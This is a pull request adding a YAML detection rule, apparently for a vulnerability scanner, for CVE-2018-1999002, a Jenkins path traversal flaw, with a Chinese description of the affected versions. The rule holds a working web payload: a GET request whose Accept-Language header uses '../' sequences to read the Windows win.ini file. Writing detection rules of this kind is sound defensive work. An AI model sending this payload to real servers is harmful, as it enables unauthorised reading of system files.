### PR TITLE
Jenkins-path-traversal-CVE-2018-1999002

### DIFF
--- a/pocs/Jenkins-path-traversal-CVE-2018-1999002.yml
+++ b/pocs/Jenkins-path-traversal-CVE-2018-1999002.yml
@@ -1,0 +1,14 @@
+name: poc-yaml-Jenkins-path-traversal-CVE-2018-1999002
+rules:
+  - method: GET
+    path: /plugin/jquery-detached/.ini
+    headers:
+      Accept-Language: "/../../../../../../../../../../../../windows/win"
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"; for 16-bit app support")&&&& response.body.bcontains(b"mci extensions")
+  author: su
+  links:
+    - https://mp.weixin.qq.com/s/T6s2yB92wTPiQnQ9FpJ3MQ
+
+

--- a/pocs/Jenkins-path-traversal-CVE-2018-1999002.yml
+++ b/pocs/Jenkins-path-traversal-CVE-2018-1999002.yml
@@ -6,7 +6,7 @@ rules:
       Accept-Language: "/../../../../../../../../../../../../windows/win"
     follow_redirects: false
     expression: |
-      response.status == 200 && response.body.bcontains(b"; for 16-bit app support")&&&& response.body.bcontains(b"mci extensions")
+      response.status == 200 && response.body.bcontains(b";for 16-bit app support")&& response.body.bcontains(b"mci extensions")
   author: su
   links:
     - https://mp.weixin.qq.com/s/T6s2yB92wTPiQnQ9FpJ3MQ


### PR DESCRIPTION
Jenkins-path-traversal-CVE-2018-1999002


## 本 poc 是检测什么漏洞的
检测Jenkins weekly 2.132以前及Jenkins LTS 2.121.1以前版本的目录穿越漏洞。可以读取Windows系统服务器中的任意文件，且在特定而条件下也可以读取Linux系统服务器中的文件，但是Linux过于鸡肋就只提交win下的。
## 测试环境
无
## 备注
影响版本：
  Jenkins weekly  2.132及此前所有版本   
  Jenkins LTS  2.121.1及此前所有版本  